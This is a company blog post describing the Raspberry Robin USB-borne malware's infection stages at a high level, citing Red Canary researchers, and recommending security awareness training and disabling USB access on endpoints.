Beware Random Thumb Drives: Raspberry Robin Malware…


May 6, 2022

As if any well-minded cybersecurity professional would be trusting of the little buggers in the first place. Anywho, there’s a new malware making the rounds. It’s called Raspberry Robin and it lives almost exclusively on compromised USB drives.

The malware was first noticed in September of 2021 by the team over at Red Canary, a managed detection and response firm.  According to researchers, the life cycle of Raspberry Robin is as follows:

  1. Infected USB drive attached – Raspberry Robin is typically introduced by infected removable drives – such as USB devices – containing a malicious .LINK file
  2. cmd.exe and misexec.exe commands cmd.exe read and executes a malicious file stored on the infected device, then misiexec.exe attempts to connect to a short URL (often QNAP-associated)
  3. Malicious .DLL download – If the external misexec.exe connection is successful, it downloads and installs a malicious .DLL
  4. rundll32.exe and Windows utility misuserundll32.exe launches a legitimate Windows utility like odbcconf.exe to execute the malicious .DLL
  5. Ongoing command & control activityregsvr32.exe, rundll32.exe, and dllhost.exe repeatedly attempt outbound network connections, typically to TOR nodes

What does that mean?

So, basically, Raspberry Robin lives on external drives, like USB drives, memory cards, whatnot. When they’re plugged into a windows machine they being a process of downloading a payload. After the payload is downloaded, the malware uses cmd.exe to execute it.

Raspberry Robin uses legitimate Windows utilities like fodhelper.exe, rundll32.exe to rundll32exe and odbcconf.exe to bypass the User Account Control (UAC).

Nobody’s sure what Raspberry Robin actually does yet, however. Upon installation, the malware reaches out to various nodes associated with Tor. Red Canary has been unable to decipher what happens next, if anything.

“We also don’t know why Raspberry Robin installs a malicious DLL,” the researchers said. “One hypothesis is that it may be an attempt to establish persistence on an infected system.”

How can you protect yourself?

The two things that come to mind first are these:

  1. Security Awareness Training
  2. Disable USB access on endpoints

Why Security Awareness Training?

A healthy cybersecurity posture can only be formed on a strong foundation, made up of the combined efforts of a cyber security-minded workforce. If the workforce is aware of the threats posed by plugging in a seemingly random USB drive found on a sidewalk outside your place of business, malware like Raspberry Robin can’t take hold in the first place.

No matter what you do, no matter what cybersecurity implementation you put in place, you’ll only ever be as strong as your weakest link. By educating the masses (so to speak) you’re bolstering every other cybersecurity endeavor you’re putting in place to keep the business safe. You’re closing gaps rather than opening them.

You can learn more about Security Awareness Training here:

Why disable USB access on endpoints?

No matter what you do, there’s going to be one meathead in the organization who either forgets their security awareness training or didn’t care about security awareness training to begin with and likes to live life on the edge, plugging anything they find in immediately, just to see what’s on it.

If you disable USB access on your endpoints,  no matter what the meathead does, they won’t be successful in their endeavor. In some cases, this might really be the only way to stop curiosity from killing that damn cat.

Carl Keyser is the Content Manager at Integris.

Keep reading

What to Know Before Installing Co-Pilot for Microsoft Word

What to Know Before Installing Co-Pilot for Microsoft Word

Imagine having an AI assistant that pulls from your notes, marries them to an existing document format, and writes a document for you. That's the power of Copilot for Microsoft Word, which is planned for rollout in 2024 for those who buy the Copilot M365 license....

Bridging the Gap between Automation and Innovation

Bridging the Gap between Automation and Innovation

Automation and Innovation. Some people might say those two words cancel each other out. Yet, I believe these two concepts can create capacity for each other—if your business leverages the free time automation creates to foster innovation. Automation can be...